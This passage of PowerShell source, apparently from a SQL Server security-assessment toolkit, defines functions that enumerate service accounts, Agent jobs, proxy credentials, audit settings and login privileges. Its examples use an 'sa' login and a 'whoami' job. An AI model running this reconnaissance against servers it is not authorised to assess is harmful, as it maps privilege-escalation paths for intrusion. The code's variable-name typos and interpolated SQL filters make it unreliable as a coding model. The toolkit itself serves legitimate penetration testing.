.EXAMPLE PS C:\> Get-SQLServiceAccount -Instance SQLServer1\STANDARDDEV2014 ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 DBEngineLogin : LocalSystem AgentLogin : NT Service\SQLAgent$STANDARDDEV2014 BrowserLogin : NT AUTHORITY\LOCALSERVICE WriterLogin : LocalSystem AnalysisLogin : NT Service\MSOLAP$STANDARDDEV2014 ReportLogin : NT Service\ReportServer$STANDARDDEV2014 IntegrationLogin : NT Service\MsDtsServer120 .EXAMPLE PS C:\> Get-SQLInstanceDomain | Get-SQLServiceAccount -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblServiceAccount = New-Object -TypeName System.Data.DataTable } Process { # Note: Tables queried by this function typically require sysadmin privileges. # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Get sysadmin status $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin if($IsSysadmin -eq 'Yes') { $SysadminSetup = " -- Get SQL Server Browser - Static Location EXECUTE master.dbo.xp_instance_regread @rootkey = N'HKEY_LOCAL_MACHINE', @key = N'SYSTEM\CurrentControlSet\Services\SQLBrowser', @value_name = N'ObjectName', @value = @BrowserLogin OUTPUT -- Get SQL Server Writer - Static Location EXECUTE master.dbo.xp_instance_regread @rootkey = N'HKEY_LOCAL_MACHINE', @key = N'SYSTEM\CurrentControlSet\Services\SQLWriter', @value_name = N'ObjectName', @value = @WriterLogin OUTPUT -- Get MSOLAP - Calculated EXECUTE master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE', @MSOLAPInstance, N'ObjectName',@AnalysisLogin OUTPUT -- Get Reporting - Calculated EXECUTE master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE', @ReportInstance, N'ObjectName',@ReportLogin OUTPUT -- Get SQL Server DTS Server / Analysis - Calulated EXECUTE master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE', @IntegrationVersion, N'ObjectName',@IntegrationDtsLogin OUTPUT" $SysadminQuery = ' ,[BrowserLogin] = @BrowserLogin, [WriterLogin] = @WriterLogin, [AnalysisLogin] = @AnalysisLogin, [ReportLogin] = @ReportLogin, [IntegrationLogin] = @IntegrationDtsLogin' } else { $SysadminSetup = '' $SysadminQuery = '' } # Define Query $Query = " -- Setup variables DECLARE @SQLServerInstance VARCHAR(250) DECLARE @MSOLAPInstance VARCHAR(250) DECLARE @ReportInstance VARCHAR(250) DECLARE @AgentInstance VARCHAR(250) DECLARE @IntegrationVersion VARCHAR(250) DECLARE @DBEngineLogin VARCHAR(100) DECLARE @AgentLogin VARCHAR(100) DECLARE @BrowserLogin VARCHAR(100) DECLARE @WriterLogin VARCHAR(100) DECLARE @AnalysisLogin VARCHAR(100) DECLARE @ReportLogin VARCHAR(100) DECLARE @IntegrationDtsLogin VARCHAR(100) -- Get Service Paths for default and name instance if @@SERVICENAME = 'MSSQLSERVER' or @@SERVICENAME = HOST_NAME() BEGIN -- Default instance paths set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQLSERVER' set @MSOLAPInstance = 'SYSTEM\CurrentControlSet\Services\MSSQLServerOLAPService' set @ReportInstance = 'SYSTEM\CurrentControlSet\Services\ReportServer' set @AgentInstance = 'SYSTEM\CurrentControlSet\Services\SQLSERVERAGENT' set @IntegrationVersion = 'SYSTEM\CurrentControlSet\Services\MsDtsServer'+ SUBSTRING(CAST(SERVERPROPERTY('productversion') AS VARCHAR(255)),0, 3) + '0' END ELSE BEGIN -- Named instance paths set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQL$' + cast(@@SERVICENAME as varchar(250)) set @MSOLAPInstance = 'SYSTEM\CurrentControlSet\Services\MSOLAP$' + cast(@@SERVICENAME as varchar(250)) set @ReportInstance = 'SYSTEM\CurrentControlSet\Services\ReportServer$' + cast(@@SERVICENAME as varchar(250)) set @AgentInstance = 'SYSTEM\CurrentControlSet\Services\SQLAgent$' + cast(@@SERVICENAME as varchar(250)) set @IntegrationVersion = 'SYSTEM\CurrentControlSet\Services\MsDtsServer'+ SUBSTRING(CAST(SERVERPROPERTY('productversion') AS VARCHAR(255)),0, 3) + '0' END -- Get SQL Server - Calculated EXECUTE master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE', @SQLServerInstance, N'ObjectName',@DBEngineLogin OUTPUT -- Get SQL Server Agent - Calculated EXECUTE master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE', @AgentInstance, N'ObjectName',@AgentLogin OUTPUT $SysadminSetup -- Dislpay results SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], [DBEngineLogin] = @DBEngineLogin, [AgentLogin] = @AgentLogin $SysadminQuery" # Execute Query $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Append results $TblServiceAccount = $TblServiceAccount + $TblResults } End { # Return data $TblServiceAccount } } # ---------------------------------- # Get-SQLAgentJob # ---------------------------------- # Author: Leo Loobeek and Scott Sutherland Function Get-SQLAgentJob { <# .SYNOPSIS This function will check the current login's privileges and return a list of the jobs they have privileges to view. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER ProxyCredential Only return SQL Agent jobs using a specific proxy credential. .PARAMETER UsingProxyCredential Only return SQL Agent jobs using a proxy credentials. .PARAMETER SubSystem Only return SQL Agent jobs for specific subsystems. .PARAMETER Keyword Only return SQL Agent jobs that have a command that includes a specific keyword. .PARAMETER DAC Connect using Dedicated Admin Connection. .PARAMETER TimeOut Connection time out. .PARAMETER SuppressVerbose Suppress verbose errors. Used when function is wrapped. .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLAgentJob -Verbose -Username sa -Password 'Password123!' | select Instance, Job_name, Step_name, SubSystem, Command | ft VERBOSE: SQL Server Agent Job Search Starting... VERBOSE: MSSQLSRV04\BOSCHSQL : Connection Failed. VERBOSE: MSSQLSRV04\SQLSERVER2014 : Connection Success. VERBOSE: MSSQLSRV04\SQLSERVER2014 : - SQL Server Agent service enabled. VERBOSE: MSSQLSRV04\SQLSERVER2014 : - Attempting to list existing agent jobs as sa. VERBOSE: MSSQLSRV04\SQLSERVER2014 : - 4 agent jobs found. VERBOSE: MSSQLSRV04\SQLSERVER2016 : Connection Success. VERBOSE: MSSQLSRV04\SQLSERVER2016 : - SQL Server Agent service has not been started. VERBOSE: MSSQLSRV04\SQLSERVER2016 : - Attempting to list existing agent jobs as sa. VERBOSE: MSSQLSRV04\SQLSERVER2016 : - 3 agent jobs found. VERBOSE: 7 agents jobs were found in total. VERBOSE: SQL Server Agent Job Search Complete. Instance JOB_NAME step_name subsystem command -------- -------- --------- --------- ------- MSSQLSRV04\SQLSERVER2014 syspolicy_purge_history Verify that automation is enabled. TSQL IF (msdb.dbo.fn_syspolicy_is_autom... MSSQLSRV04\SQLSERVER2014 syspolicy_purge_history Purge history. TSQL EXEC msdb.dbo.sp_syspolicy_purge_h... MSSQLSRV04\SQLSERVER2014 syspolicy_purge_history Erase Phantom System Health Records. PowerShell if ('$(ESCAPE_SQUOTE(INST))' -eq '... MSSQLSRV04\SQLSERVER2014 test test1 CmdExec whoami MSSQLSRV04\SQLSERVER2016 syspolicy_purge_history Verify that automation is enabled. TSQL IF (msdb.dbo.fn_syspolicy_is_autom... MSSQLSRV04\SQLSERVER2016 syspolicy_purge_history Purge history. TSQL EXEC msdb.dbo.sp_syspolicy_purge_h... MSSQLSRV04\SQLSERVER2016 syspolicy_purge_history Erase Phantom System Health Records. PowerShell if ('$(ESCAPE_SQUOTE(INST))' -eq '... #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Only return SQL Agent jobs for specific subsystems.')] [ValidateSet("TSQL","PowerShell","CMDEXEC","PowerShell","ActiveScripting","ANALYSISCOMMAND","ANALYSISQUERY","Snapshot","Distribution","LogReader","Merge","QueueReader")] [String]$SubSystem, [Parameter(Mandatory = $false, HelpMessage = 'Only return SQL Agent jobs that have a command that includes a specific keyword.')] [String]$Keyword, [Parameter(Mandatory = $false, HelpMessage = 'Only return SQL Agent jobs using a proxy credentials.')] [Switch]$UsingProxyCredential, [Parameter(Mandatory = $false, HelpMessage = 'Only return SQL Agent jobs using a specific proxy credential.')] [String]$ProxyCredential, [Parameter(Mandatory = $false, HelpMessage = 'Connect using Dedicated Admin Connection.')] [Switch]$DAC, [Parameter(Mandatory = $false, HelpMessage = 'Connection timeout.')] [string]$TimeOut, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { if(-not $SuppressVerbose){ Write-Verbose -Message "SQL Server Agent Job Search Starting..." } # Setup data table for output $TblResults = New-Object -TypeName System.Data.DataTable $null = $TblResults.Columns.Add('ComputerName') $null = $TblResults.Columns.Add('Instance') $null = $TblResults.Columns.Add('DatabaseName') $null = $TblResults.Columns.Add('Job_Id') $null = $TblResults.Columns.Add('Job_Name') $null = $TblResults.Columns.Add('Job_Description') $null = $TblResults.Columns.Add('Job_Owner') $null = $TblResults.Columns.Add('Proxy_Id') $null = $TblResults.Columns.Add('Proxy_Credential') $null = $TblResults.Columns.Add('Date_Created') $null = $TblResults.Columns.Add('Last_Run_Date') $null = $TblResults.Columns.Add('Enabled') $null = $TblResults.Columns.Add('Server') $null = $TblResults.Columns.Add('Step_Name') $null = $TblResults.Columns.Add('SubSystem') $null = $TblResults.Columns.Add('Command') # Setup SubSystem filter if($SubSystem) { $SubSystemFilter = " and steps.subsystem like '$SubSystem'" } else { $SubSustemFilter = '' } # Setup Command Keyword filter if($Keyword) { $KeywordFilter = " and steps.command like '%$Keyword%'" } else { $KeywordFilter = '' } # Setup filter to only return jobs with proxy cred if($UsingProxyCredential) { $UsingProxyCredFilter = " and steps.proxy_id > 0" } else { $UsingProxyCredFilter = '' } # Setup filter to only return jobs with specific proxy cred if($ProxyCredential) { $ProxyCredFilter = " and proxies.name like '$ProxyCredential'" } else { $ProxyCredFilter = '' } } Process { # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Setup DAC string if($DAC) { # Create connection object $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut } else { # Create connection object $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut } # Attempt connection try { # Open connection $Connection.Open() if(-not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } # Get some information about current context $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $CurrentLogin = $ServerInfo.CurrentLogin $ComputerName = $ServerInfo.ComputerName $Sysadmin = $ServerInfo.IsSysadmin # Check if Agent Job service is running $IsAgentServiceEnabled = Get-SQLQuery -Instance $Instance -Query "SELECT 1 FROM sysprocesses WHERE LEFT(program_name, 8) = 'SQLAgent'" -Username $Username -Password $Password -SuppressVerbose if ($IsAgentServiceEnabled) { if(-not $SuppressVerbose){ Write-Verbose -Message "$Instance : - SQL Server Agent service enabled." } } else { if(-not $SuppressVerbose){ Write-Verbose -Message "$Instance : - SQL Server Agent service has not been started." } } # Get logins that have SQL Agent roles # https://msdn.microsoft.com/en-us/library/ms188283.aspx $AddJobPrivs = Get-SQLDatabaseRoleMember -Username $Username -Password $Password -Instance $Instance -DatabaseName msdb -SuppressVerbose| ForEach-Object { if($_.RolePrincipalName -match "SQLAgentUserRole|SQLAgentReaderRole|SQLAgentOperatorRole") { if ($_.PrincipalName -eq $CurrentLogin) { $_ } } } if($AgentJobPrivs -or ($Sysadmin -eq "Yes")) { if(-not $SuppressVerbose){ Write-Verbose -Message "$Instance : - Attempting to list existing agent jobs as $CurrentLogin." } # Reference: https://msdn.microsoft.com/en-us/library/ms189817.aspx $Query = "SELECT steps.database_name, job.job_id as [JOB_ID], job.name as [JOB_NAME], job.description as [JOB_DESCRIPTION], SUSER_SNAME(job.owner_sid) as [JOB_OWNER], steps.proxy_id, proxies.name as [proxy_account], job.enabled, steps.server, job.date_created, steps.last_run_date, steps.step_name, steps.subsystem, steps.command FROM [msdb].[dbo].[sysjobs] job INNER JOIN [msdb].[dbo].[sysjobsteps] steps ON job.job_id = steps.job_id left join [msdb].[dbo].[sysproxies] proxies on steps.proxy_id = proxies.proxy_id WHERE 1=1 $KeywordFilter $SubSystemFilter $ProxyCredFilter $UsingProxyCredFilter" # Execute Query $result = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -SuppressVerbose # Check the results if(!($result)) { Write-Verbose -Message "$Instance : - Either no jobs exist or the current login ($CurrentLogin) doesn't have the privileges to view them." return } # Get number of results $AgentJobCount = $result.rows.count if(-not $SuppressVerbose){ Write-Verbose -Message "$Instance : - $AgentJobCount agent jobs found." } # Update data table $result | ForEach-Object{ $null = $TblResults.Rows.Add($ComputerName, $Instance, $_.database_name, $_.JOB_ID, $_.JOB_NAME, $_.JOB_DESCRIPTION, $_.JOB_OWNER, $_.proxy_id, $_.proxy_account, $_.date_created, $_.last_run_date, $_.enabled, $_.server, $_.step_name, $_.subsystem, $_.command) } } else { if(-not $SuppressVerbose){ Write-Verbose -Message "$Instance : - The current login ($CurrentLogin) does not have any agent privileges." } return } # Close connection $Connection.Close() # Dispose connection $Connection.Dispose() } catch { # Connection failed if(-not $SuppressVerbose) { $ErrorMessage = $_.Exception.Message Write-Verbose -Message "$Instance : Connection Failed." #Write-Verbose " Error: $ErrorMessage" } } } End { if(-not $SuppressVerbose){ Write-Verbose -Message "SQL Server Agent Job Search Complete." } # Get total count of jobs $TotalAgentCount = $TblResults.rows.Count # Get subsystem summary data $SummarySubSystem = $TblResults | Group-Object SubSystem | Select Name, Count | Sort-Object Count -Descending # Get proxy summary data $SummaryProxyAccount = $TblResults | Select-Object proxy_credential -Unique | Measure-Object | Select-Object Count -ExpandProperty Count # Get system summary data $SummaryServer = $TblResults | Select-Object ComputerName -Unique | Measure-Object | Select-Object Count -ExpandProperty Count # Get instance summary data $SummaryInstance = $TblResults | Select-Object Instance -Unique | Measure-Object | Select-Object Count -ExpandProperty Count if(-not $SuppressVerbose){ Write-Verbose -Message "---------------------------------" Write-Verbose -Message "Agent Job Summary" Write-Verbose -Message "---------------------------------" Write-Verbose -Message " $TotalAgentCount jobs found" Write-Verbose -Message " $SummaryServer affected systems" Write-Verbose -Message " $SummaryInstance affected SQL Server instances" Write-Verbose -Message " $SummaryProxyAccount proxy credentials used" Write-Verbose -Message "---------------------------------" Write-Verbose -Message "Agent Job Summary by SubSystem" Write-Verbose -Message "---------------------------------" $SummarySubSystem | ForEach-Object { $SubSystem_Name = $_.Name $SubSystem_Count = $_.Count Write-Verbose -Message " $SubSystem_Count $SubSystem_Name Jobs" } Write-Verbose -Message " $TotalAgentCount Total" Write-Verbose -Message "---------------------------------" } # Return data $TblResults } } # ---------------------------------- # Get-SQLAuditDatabaseSpec # ---------------------------------- # Author: Scott Sutherland Function Get-SQLAuditDatabaseSpec { <# .SYNOPSIS Returns Audit database specifications from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. .PARAMETER AuditName Audit name. .PARAMETER AuditSpecification Audit specification. .PARAMETER AuditAction Audit action name. .EXAMPLE PS C:\> Get-SQLAuditDatabaseSpec -Verbose -Instance "SQLServer1" .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLAuditDatabaseSpec -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Audit name.')] [string]$AuditName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Specification name.')] [string]$AuditSpecification, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Audit action name.')] [string]$AuditAction, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblAuditDatabaseSpec = New-Object -TypeName System.Data.DataTable # Setup audit name filter if($AuditName) { $AuditNameFilter = " and a.name like '%$AuditName%'" } else { $AuditNameFilter = '' } # Setup spec name filter if($AuditSpecification) { $SpecNameFilter = " and s.name like '%$AuditSpecification%'" } else { $SpecNameFilter = '' } # Setup action name filter if($AuditAction) { $ActionNameFilter = " and d.audit_action_name like '%$AuditAction%'" } else { $ActionNameFilter = '' } } Process { # Note: Tables queried by this function typically require sysadmin privileges. # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Define Query $Query = " SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], audit_id as [AuditId], a.name as [AuditName], s.name as [AuditSpecification], d.audit_action_id as [AuditActionId], d.audit_action_name as [AuditAction], d.major_id, OBJECT_NAME(d.major_id) as object, s.is_state_enabled, d.is_group, s.create_date, s.modify_date, d.audited_result FROM sys.server_audits AS a JOIN sys.database_audit_specifications AS s ON a.audit_guid = s.audit_guid JOIN sys.database_audit_specification_details AS d ON s.database_specification_id = d.database_specification_id WHERE 1=1 $AuditNameFilter $SpecNameFilter $ActionNameFilter" # Execute Query $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -SuppressVerbose # Append results $TblAuditDatabaseSpec = $TblAuditDatabaseSpec + $TblResults } End { # Return data $TblAuditDatabaseSpec } } # ---------------------------------- # Get-SQLAuditServerSpec # ---------------------------------- # Author: Scott Sutherland Function Get-SQLAuditServerSpec { <# .SYNOPSIS Returns Audit server specifications from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. .PARAMETER AuditName Audit name. .PARAMETER AuditSpecification Audit specification. .PARAMETER AuditAction Audit action name. .EXAMPLE PS C:\> Get-SQLAuditServerSpec -Verbose -Instance "SQLServer1" .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLAuditServerSpec -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Audit name.')] [string]$AuditName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Specification name.')] [string]$AuditSpecification, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Audit action name.')] [string]$AuditAction, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblAuditServerSpec = New-Object -TypeName System.Data.DataTable # Setup audit name filter if($AuditName) { $AuditNameFilter = " and a.name like '%$AuditName%'" } else { $AuditNameFilter = '' } # Setup spec name filter if($AuditSpecification) { $SpecNameFilter = " and s.name like '%$AuditSpecification%'" } else { $SpecNameFilter = '' } # Setup action name filter if($AuditAction) { $ActionNameFilter = " and d.audit_action_name like '%$AuditAction%'" } else { $ActionNameFilter = '' } } Process { # Note: Tables queried by this function typically require sysadmin privileges. # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Define Query $Query = " SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], audit_id as [AuditId], a.name as [AuditName], s.name as [AuditSpecification], d.audit_action_name as [AuditAction], s.is_state_enabled, d.is_group, d.audit_action_id as [AuditActionId], s.create_date, s.modify_date FROM sys.server_audits AS a JOIN sys.server_audit_specifications AS s ON a.audit_guid = s.audit_guid JOIN sys.server_audit_specification_details AS d ON s.server_specification_id = d.server_specification_id WHERE 1=1 $AuditNameFilter $SpecNameFilter $ActionNameFilter" # Execute Query $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -SuppressVerbose # Append results $TblAuditServerSpec = $TblAuditServerSpec + $TblResults } End { # Return data $TblAuditServerSpec } } # ---------------------------------- # Get-SQLServerPriv # ---------------------------------- # Author: Scott Sutherland Function Get-SQLServerPriv { <# .SYNOPSIS Returns SQL Server login privilege information from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER PermissionName Permission name to filter for. .EXAMPLE PS C:\> Get-SQLServerPriv -Instance SQLServer1\STANDARDDEV2014 -PermissionName IMPERSONATE ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 GranteeName : public GrantorName : sa PermissionClass : SERVER_PRINCIPAL PermissionName : IMPERSONATE PermissionState : GRANT ObjectName : sa ObjectType : SQL_LOGIN .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLServerPriv -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Permission name.')] [string]$PermissionName, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblServerPrivs = New-Object -TypeName System.Data.DataTable # Setup $PermissionName filter if($PermissionName) { $PermissionNameFilter = " WHERE PER.permission_name like '$PermissionName'" } else { $PermissionNameFilter = '' } } Process { # Note: Tables queried by this function typically require sysadmin privileges to get all rows. # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Define Query $Query = " SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], GRE.name as [GranteeName], GRO.name as [GrantorName], PER.class_desc as [PermissionClass], PER.permission_name as [PermissionName], PER.state_desc as [PermissionState], COALESCE(PRC.name, EP.name, N'') as [ObjectName], COALESCE(PRC.type_desc, EP.type_desc, N'') as [ObjectType] FROM [sys].[server_permissions] as PER INNER JOIN sys.server_principals as GRO ON PER.grantor_principal_id = GRO.principal_id INNER JOIN sys.server_principals as GRE ON PER.grantee_principal_id = GRE.principal_id LEFT JOIN sys.server_principals as PRC ON PER.class = 101 AND PER.major_id = PRC.principal_id LEFT JOIN sys.endpoints AS EP ON PER.class = 105 AND PER.major_id = EP.endpoint_id $PermissionNameFilter ORDER BY GranteeName,PermissionName;" # Execute Query $TblServerPrivsTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Append data as needed $TblServerPrivs = $TblServerPrivs + $TblServerPrivsTemp } End { # Return data $TblServerPrivs } } # ---------------------------------- # Get-SQLDatabasePriv # ---------------------------------- # Author: Scott Sutherland Function Get-SQLDatabasePriv { <# .SYNOPSIS Returns database user privilege information from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. .PARAMETER DatabaseName Database name to filter for. .PARAMETER NoDefaults Only select non default databases. .PARAMETER PermissionName Permission name to filter for. .PARAMETER PermissionType Permission type name to filter for. .PARAMETER PrincipalName Principal name to filter for. .EXAMPLE PS C:\> Get-SQLDatabasePriv -Instance SQLServer1\STANDARDDEV2014 -DatabaseName testdb -PermissionName "VIEW DEFINITION" ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 DatabaseName : testdb PrincipalName : createprocuser PrincipalType : SQL_USER PermissionType : SCHEMA PermissionName : VIEW DEFINITION StateDescription : GRANT ObjectType : SCHEMA ObjectName : dbo .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLDatabasePriv -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server database name to filter for.')] [string]$DatabaseName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Permission name to filter for.')] [string]$PermissionName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Permission type to filter for.')] [string]$PermissionType, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Principal name for grantee to filter for.')] [string]$PrincipalName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = "Don't select permissions for default databases.")] [switch]$NoDefaults, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblDatabasePrivs = 